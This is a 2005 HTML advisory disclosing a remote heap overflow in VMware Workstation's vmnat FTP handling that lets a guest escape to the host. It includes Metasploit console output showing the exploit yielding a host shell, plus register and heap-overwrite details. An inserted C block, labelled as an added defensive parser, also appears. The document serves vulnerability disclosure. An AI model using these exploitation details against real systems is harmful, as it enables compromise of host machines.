<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=us-ascii">
<META NAME="Generator" CONTENT="MS Exchange Server version 5.5.2657.88">
<TITLE>[ACSSEC-2005-11-25-0x1] VMWare Workstation 5.5.0 <= build-18007 GSX Server Variants And Others</TITLE>
</HEAD>
<BODY>
<BR>
<BR>
<P><FONT SIZE=2>-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-</FONT>
<BR><FONT SIZE=2>ACS Security Assessment Advisory - Remote Heap Overflow</FONT>
</P>
<P><FONT SIZE=2>ID: ACSSEC-2005-11-25 - 0x1</FONT>
</P>
<P><FONT SIZE=2>Class: Remote Heap Overflow</FONT>
<BR><FONT SIZE=2>Package: VMWare Workstation 5.5.0 <= build-18007</FONT>
<BR> <FONT SIZE=2> VMWare GSX Server Variants</FONT>
<BR> <FONT SIZE=2> VMWare Ace Variants</FONT>
<BR><FONT SIZE=2> VMWare Player Variants</FONT>
<BR><FONT SIZE=2>Exempt: VMWare ESX Server Variants</FONT>
<BR><FONT SIZE=2>Build: Windows NT/2k/XP/2k3</FONT>
<BR><FONT SIZE=2>Notified: Dec 01, 2005</FONT>
<BR><FONT SIZE=2>Released: Dec 21, 2005</FONT>
</P>
<P><FONT SIZE=2>Remote: Yes</FONT>
<BR><FONT SIZE=2>Severity: High</FONT>
</P>
<P><FONT SIZE=2>Credit: Tim Shelton <security-advisories@acs-inc.com></FONT>
<BR><FONT SIZE=2>-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-</FONT>
</P>
<P><FONT SIZE=2>-=[ Background</FONT>
</P>
<P><FONT SIZE=2>"VMware Workstation is powerful desktop virtualization software for software developers/testers and enterprise IT professionals that runs multiple operating systems simultaneously on a single PC. Users can run Windows, Linux, NetWare, or Solaris x86 in fully networked, portable virtual machines - no rebooting or hard drive partitioning required. VMware Workstation delivers excellent performance and advanced features such as memory optimization and the ability to manage multi-tier configurations and multiple snapshots.</FONT></P>
<P><FONT SIZE=2>With millions of customers and dozens of major product awards over the last six years, VMware Workstation is a proven technology that improves productivity and flexibility. An indispensable tool for software developers and IT professionals worldwide."</FONT></P>
<P> <FONT SIZE=2>-- <A HREF="http://www.vmware.com/products/ws/" TARGET="_blank">http://www.vmware.com/products/ws/</A></FONT>
</P>
<BR>
<BR>
<P><FONT SIZE=2>-=[ Technical Description</FONT>
</P>
<P><FONT SIZE=2>A vulnerability was identified in vmnat.exe of VMware Workstation (and the other products listed above), which could be exploited by remote attackers to execute arbitrary commands. The vulnerability allows an escape from a VMware virtual machine into userland on the host, compromising the host. </FONT></P>
<P><FONT SIZE=2>vmnat does not safely process specially crafted FTP 'EPRT' and 'PORT' requests. </FONT>
</P>
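<P><FONT SIZE=2>As an added defensive illustration (not part of the advisory and not VMware's code): a bounds-checked parser for the PORT (RFC 959) and EPRT (RFC 2428, IPv4 only here) arguments that an FTP NAT helper such as vmnat has to inspect. It assumes a constructed FTP_ARG_MAX limit and rejects over-long or malformed arguments before any value is used, which is the shape of input the advisory says vmnat fails to handle.</FONT></P>

```c
#include <ctype.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Constructed upper bound: any legal PORT/EPRT argument is far shorter. */
#define FTP_ARG_MAX 64
/* Read `count` decimal numbers <= max, separated by sep; 1 on success. */
static int read_fields(const char **p, unsigned *out, int count, char sep, unsigned max)
{
    for (int i = 0; i < count; i++) {
        char *end;
        if (!isdigit((unsigned char)**p)) return 0;   /* no sign, space or empty field */
        unsigned long x = strtoul(*p, &end, 10);
        if (x > max) return 0;                       /* out-of-range octet or port */
        out[i] = (unsigned)x;
        *p = end;
        if (i + 1 < count) { if (**p != sep) return 0; (*p)++; }
    }
    return 1;
}
/* Reject empty or over-long arguments before anything is parsed or copied. */
static int arg_len_ok(const char *arg)
{
    const char *nul = memchr(arg, '\0', FTP_ARG_MAX + 1);
    return nul != NULL && nul != arg;
}
/* PORT h1,h2,h3,h4,p1,p2 (RFC 959): fills ip (host order) and port; 1 on success. */
int parse_port_arg(const char *arg, uint32_t *ip, uint16_t *port)
{
    unsigned v[6];
    if (!arg_len_ok(arg) || !read_fields(&arg, v, 6, ',', 255) || *arg != '\0') return 0;
    *ip = ((uint32_t)v[0] << 24) | (v[1] << 16) | (v[2] << 8) | v[3];
    *port = (uint16_t)((v[4] << 8) | v[5]);
    return *port != 0;                               /* port 0 is never valid */
}
/* EPRT <d>1<d>h.h.h.h<d>port<d> (RFC 2428, IPv4 only): 1 on success. */
int parse_eprt_arg(const char *arg, uint32_t *ip, uint16_t *port)
{
    unsigned proto, v[4], prt;
    char d = *arg;                                   /* delimiter: printable, not a digit */
    if (!arg_len_ok(arg++) || isdigit((unsigned char)d) || !isprint((unsigned char)d)) return 0;
    if (!read_fields(&arg, &proto, 1, d, 9) || proto != 1 || *arg++ != d) return 0;
    if (!read_fields(&arg, v, 4, '.', 255) || *arg++ != d) return 0;
    if (!read_fields(&arg, &prt, 1, d, 65535) || prt == 0 || *arg++ != d || *arg != '\0') return 0;
    *ip = ((uint32_t)v[0] << 24) | (v[1] << 16) | (v[2] << 8) | v[3];
    *port = (uint16_t)prt;
    return 1;
}
```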
<BR>
<BR>
<P><FONT SIZE=2>-=[ Proof of Concept:</FONT>
<BR><FONT SIZE=2>-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-</FONT>
</P>
<P><FONT SIZE=2>msf > use vmware_vmnat</FONT>
<BR><FONT SIZE=2>msf vmware_vmnat(win32_bind) > exploit</FONT>
<BR><FONT SIZE=2>[*] Starting Bind Handler.</FONT>
<BR><FONT SIZE=2>[*] VMWare vmnat Remote Heap Exploit by Tim Shelton <security@acs-inc.com></FONT>
<BR><FONT SIZE=2>[*] 220 #### FTP Server Ready.</FONT>
<BR><FONT SIZE=2>[*] Login as anonymous/login</FONT>
<BR><FONT SIZE=2>[*] Sending evil buffer....</FONT>
<BR><FONT SIZE=2>[*] No response from FTP server</FONT>
<BR><FONT SIZE=2>[*] Exiting Bind Handler.</FONT>
<BR><FONT SIZE=2>vmnat.exe: Access violation when writing to [2F5C2F5C] <- Controllable Registers</FONT>
</P>
<P><FONT SIZE=2>-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-</FONT>
</P>
<P><FONT SIZE=2>-=[ Breakdown </FONT>
</P>
<P><FONT SIZE=2>Control over the registers ECX, EDI and EBX allows you to overwrite an available </FONT>
<BR><FONT SIZE=2>heap header's PLINK and FLINK. </FONT>
</P>
<P><FONT SIZE=2>EDX points to your buffer on overwrite.</FONT>
</P>
<P><FONT SIZE=2>The overwrite occurs at ntdll.0x7C926A36 (Windows XP SP2, build 2600).</FONT>
</P>
<P><FONT SIZE=2>-=[ Functioning Overflow of Concept:</FONT>
<BR><FONT SIZE=2>-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-</FONT>
</P>
<P><FONT SIZE=2>msf > use vmware_vmnat_0day</FONT>
<BR><FONT SIZE=2>msf vmware_vmnat_0day(win32_bind) > exploit</FONT>
<BR><FONT SIZE=2>[*] Starting Bind Handler.</FONT>
<BR><FONT SIZE=2>[*] VMWare vmnat Remote Heap Exploit 0day by Tim Shelton <security@acs-inc.com></FONT>
<BR><FONT SIZE=2>[*] 220 #### FTP Server Ready.</FONT>
<BR><FONT SIZE=2>[*] Login as anonymous/login</FONT>
<BR><FONT SIZE=2>[*] Sending evil buffer....</FONT>
<BR><FONT SIZE=2>[*] Got connection from 192.168.79.130:34941 <-> 192.168.79.2:4444</FONT>
</P>
<P><FONT SIZE=2>Microsoft Windows XP [Version 5.1.2600]</FONT>
<BR><FONT SIZE=2>(C) Copyright 1985-2001 Microsoft Corp.</FONT>
</P>
<P><FONT SIZE=2>C:\Program Files\VMware Workstation></FONT>
</P>
<P><FONT SIZE=2>-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-</FONT>
</P>
<BR>
<P><FONT SIZE=2>-=[ Credits</FONT>
</P>
<P><FONT SIZE=2>Vulnerability originally reported and exploited by Tim Shelton</FONT>
</P>
<BR>
<P><FONT SIZE=2>-=[ ChangeLog</FONT>
</P>
<P><FONT SIZE=2>2005-11-25 : Original Advisory</FONT>
<BR><FONT SIZE=2>2005-12-01 : Notified Vendor</FONT>
<BR><FONT SIZE=2>2005-12-20 : Vendor released patch, disclosing full information.</FONT>
</P>
</BODY>
</HTML>